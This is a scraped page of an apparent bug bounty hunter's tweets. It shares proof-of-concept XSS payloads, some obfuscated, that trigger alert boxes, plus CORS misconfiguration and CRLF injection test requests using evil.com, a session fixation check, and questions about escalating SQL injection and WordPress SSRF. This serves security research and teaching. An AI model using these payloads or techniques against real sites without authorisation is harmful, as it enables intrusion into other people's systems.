Adem süslü (@suslu7616) Twitter Tweets • TwiCopy

Adem süslü

3 months ago

I found #sqlinjection on site. How do you increase the impact or chain? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips #sqlmap

thumb_up_off_alt78

chat_bubble_outline3

repeat4

shareShare

I found #xss on #ecommerce site. Payload; ">>>>><input autofocus onfocus="alert(5)"> How do you increase the impact? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt57

chat_bubble_outline0

repeat1

shareShare

Adem süslü

@suslu7616

3 months ago

I found #xss on site. Payload: <style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #bugbountytips

thumb_up_off_alt61

chat_bubble_outline1

repeat5

shareShare

Adem süslü

@suslu7616

2 months ago

Forget everything, hacked & chill 😁😁 #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt0

chat_bubble_outline0

repeat0

shareShare

Adem süslü

@suslu7616

2 months ago

#CORS Misconfiguration If we see evil.com is in the response Request: GET /about HTTP/2 Host: some.com Origin: evil.com Response: HTTP/2 200 Access-Control-Allow-Origin: evil.com Access-Control-Allow-Credentials: true

thumb_up_off_alt53

chat_bubble_outline2

repeat6

shareShare

Adem süslü

@suslu7616

2 months ago

I found #xss on site. Payload; "><?<a href="><svg/onload=alert(2)>"> Those who seek are not found, but those who find are the ones who seek. #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt80

chat_bubble_outline0

repeat10

shareShare

Adem süslü

@suslu7616

2 months ago

I found #xss on site. Payload; " outofocus onfocus=alert(origin) x=" #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt75

chat_bubble_outline1

repeat1

shareShare

Adem süslü

@suslu7616

2 months ago

#CORS Misconfiguration If we see evil.com is in the response Request: Poc for run this html file

thumb_up_off_alt24

chat_bubble_outline2

repeat1

shareShare

Adem süslü

@suslu7616

2 months ago

I found #xss on someone site. Payload;"><?<a href="><svg/onload=alert(2)>"> #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt66

chat_bubble_outline0

repeat3

shareShare

Adem süslü

@suslu7616

2 months ago

I found #selfxss Payload:">>>>>><marquee>RXSS</marquee></head><abc></script><script>alert(origin)</script><meta What is possible with Self-XSS? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt46

chat_bubble_outline3

repeat1

shareShare

Adem süslü

@suslu7616

2 months ago

#CRLF Injection If we see X-Custom-Header: test is in the response hedef-site.com/%0d%0aX-Custom… Request: GET /%0d%0aX-Custom-Header%3Atest HTTP/2 Host: hedef-site.com Response: HTTP/2 200 OK Date: Tue, 10 Feb 2026 23:19:24 GMT Content-Type: text/html; charset=UTF-8 Vary:

thumb_up_off_alt65

chat_bubble_outline0

repeat11

shareShare

Adem süslü

@suslu7616

2 months ago

I found #selfxss Payload:">>>>>><marquee>RXSS</marquee></head><abc></script><script>alert(origin)</script><meta What is possible with Self-XSS? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt42

chat_bubble_outline1

repeat2

shareShare

Adem süslü

@suslu7616

2 months ago

#CORS Misconfigration ı earn $$$ #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips #bugcrowd bugcrowd

thumb_up_off_alt54

chat_bubble_outline0

repeat2

shareShare

Adem süslü

@suslu7616

2 months ago

I found #xss on someone site. Payload; <?<a href="><body onload="eval(atob('YWxlcnQoJ1N1Y2Nlc3NmdWwgWFNTJyk='))">"> How do you increase the impact? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt68

chat_bubble_outline1

repeat7

shareShare

Adem süslü

@suslu7616

2 months ago

Hello hackers, What vulnerabilities did you find last week? #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

thumb_up_off_alt8

chat_bubble_outline1

repeat1

shareShare

Adem süslü

@suslu7616

2 months ago

In a WordPress installation, I found an unauthenticated blind SSRF in xmlrpc.php (exploitable through pingback.ping, possibly via DNS rebinding or TOCTOU race condition). What is the actual severity and practical impact of this issue? Can it lead to internal network

thumb_up_off_alt9

chat_bubble_outline1

repeat1

shareShare

Adem süslü

@suslu7616

2 months ago

Session fixation; If you modify the cookie value in the request we send and the response is reflected in the body, then there is a vulnerability. POST /endpoint HTTP/2 Host: web-site.com Cookie: PHPSESSID=TESTFIXATION123456; HTTP/2 200 OK X-Frame-Options:

thumb_up_off_alt53

chat_bubble_outline4

repeat3

shareShare

Adem süslü

@suslu7616

2 months ago

/\ / \ / \ / \ ___/ \__/ \________________ die. #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips

$/\ / \ / \ / \ ___/ \__/ \________________ die. #bugbounty #xss #cybersecurity #websecurity #infosec #redteam #AppSec #hacking #cybersecuritytips #bugbountytips$

thumb_up_off_alt27

chat_bubble_outline0

repeat1

shareShare